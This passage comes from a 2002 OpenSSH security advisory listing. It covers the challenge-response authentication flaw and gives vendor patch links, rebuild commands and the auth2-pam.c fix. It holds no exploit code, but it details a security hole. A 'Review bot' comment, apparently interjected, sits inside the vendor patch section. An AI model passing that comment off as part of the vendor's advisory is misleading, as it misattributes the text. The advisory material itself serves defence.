ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-askpass-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-clients-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/openssh-server-3.3p1-3.1mdk.ppc.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Corporate Server 1.0.1:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/1.0.1/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

Single Network Firewall 7.2:
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-askpass-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-askpass-gnome-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-clients-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/RPMS/openssh-server-3.3p1-3.1mdk.i586.rpm
ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/snf7.2/SRPMS/openssh-3.3p1-3.1mdk.src.rpm

The updated packages above can also be downloaded from any of the mirror FTP servers listed at:
http://www.mandrakesecure.net/en/ftp.php

NetBSD
------
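NetBSD has released a security advisory (NetBSD-SA2002-005) and corresponding patches for this issue:
NetBSD-SA2002-005: OpenSSH protocol version 2 challenge-response authentication vulnerability
Link: ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-0005.txt.asc

Upgrade the software to the new version:

Update from CVS, then rebuild and install the software: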
  
# cd src
# cvs update -d -P crypto/dist/ssh usr.bin/ssh
# cd usr.bin/ssh

# make cleandir dependall
# make install

OpenSSH
-------
OpenSSH has released a security advisory (OSSH-20020627) and a corresponding patch for this issue:
OSSH-20020627: Revised OpenSSH Security Advisory (adv.iss)
Link: http://www.openssh.com/txt/preauth.adv

The vendor provided the following patch:

Index: auth2-pam.c
===================================================================
RCS file: /var/cvs/openssh/auth2-pam.c,v
retrieving revision 1.12
diff -u -r1.12 auth2-pam.c
--- auth2-pam.c    22 Jan 2002 12:43:13 -0000    1.12
+++ auth2-pam.c    26 Jun 2002 10:12:31 -0000
@@ -140,6 +140,15 @@
    nresp = packet_get_int();    /* Number of responses. */
    debug("got %d responses", nresp);

+
+    if (nresp != context_pam2.num_expected)
+        fatal("%s: Received incorrect number of responses "
+            "(received %u, expected %u)", __func__, nresp,
+            context_pam2.num_expected);
+
+    if (nresp > 100)
+        fatal("%s: too many replies", __func__);
+
    for (i = 0; i < nresp; i++) {
        int j = context_pam2.prompts[i];
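Review bot: `nresp` is logged with `%d` in the existing `debug` call but with `%u` in the new `fatal` message, so its signedness is ambiguous; settle on one type and a matching format. The `nresp > 100` test also sits after the equality check, so it can only fire when `context_pam2.num_expected` itself exceeds 100: put the cap first, or enforce the limit where `num_expected` is set, so that the loop index into `context_pam2.prompts[i]` is bounded in one obvious place.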

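The patch above fixes only this vulnerability. Because OpenSSH 3.3 and earlier versions also contain other potential security problems, which have been fixed in OpenSSH 3.4, you are advised to upgrade to OpenSSH 3.4 or later as soon as possible.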

RedHat
------
RedHat has released a security advisory (RHSA-2002:127-18) and corresponding patches for this issue:
RHSA-2002:127-18: Updated OpenSSH packages fix various security issues
Link: https://www.redhat.com/support/errata/RHSA-2002-127.html

Patch downloads:
Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/openssh-3.1p1-5.src.rpm

alpha:
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-askpass-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-askpass-gnome-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-clients-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/openssh-server-3.1p1-5.alpha.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/openssh-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-askpass-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-askpass-gnome-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-clients-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/openssh-server-3.1p1-5.i386.rpm

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/openssh-3.1p1-5.src.rpm

alpha:
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-askpass-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-askpass-gnome-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-clients-3.1p1-5.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/openssh-server-3.1p1-5.alpha.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/openssh-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-askpass-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-askpass-gnome-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-clients-3.1p1-5.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/openssh-server-3.1p1-5.i386.rpm

ia64:
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-askpass-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-askpass-gnome-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-clients-3.1p1-5.ia64.rpm
ftp://updates.redhat.com/7.1/en/os/ia64/openssh-server-3.1p1-5.ia64.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/openssh-3.1p1-6.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/openssh-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-askpass-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-askpass-gnome-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-clients-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/openssh-server-3.1p1-6.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-askpass-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-askpass-gnome-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-clients-3.1p1-6.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/openssh-server-3.1p1-6.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/openssh-3.1p1-6.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/openssh-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-askpass-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-askpass-gnome-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-clients-3.1p1-6.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/openssh-server-3.1p1-6.i386.rpm

The patches can be installed with the following command:

rpm -Fvh [filename]

S.u.S.E.
--------
S.u.S.E. has released a security advisory (SuSE-SA:2002:023) and corresponding patches for this issue:
SuSE-SA:2002:023: openssh
Link: http://www.suse.com/de/support/security/2002_023_openssh.html

Patch downloads:

i386 Intel Platform

    SuSE-8.0
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.3p1-6.i386.patch.rpm

    ftp://ftp.suse.com/pub/suse/i386/update/8.0/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.2
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/openssh-3.3p1-6.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/i386/update/7.0/sec1/openssh-3.3p1-6.i386.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/i386/update/7.0/zq1/openssh-3.3p1-6.src.rpm


    Sparc Platform

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/sparc/update/7.1/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/sparc/update/7.0/sec1/openssh-3.3p1-4.sparc.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/sparc/update/7.0/zq1/openssh-3.3p1-4.src.rpm


    AXP Alpha Platform

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/axp/update/7.1/sec1/openssh-3.3p1-4.alpha.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/axp/update/7.0/sec1/openssh-3.3p1-4.alpha.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/axp/update/7.0/zq1/openssh-3.3p1-4.src.rpm


    PPC Power PC Platform

    SuSE-7.3
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.1
    ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/openssh-3.3p1-4.src.rpm

    SuSE-7.0
    ftp://ftp.suse.de/pub/suse/ppc/update/7.0/sec1/openssh-3.3p1-4.ppc.rpm
    source rpm:
    ftp://ftp.suse.de/pub/suse/ppc/update/7.0/zq1/openssh-3.3p1-4.src.rpm

Patch installation:

# rpm -Fvh openssh*.rpm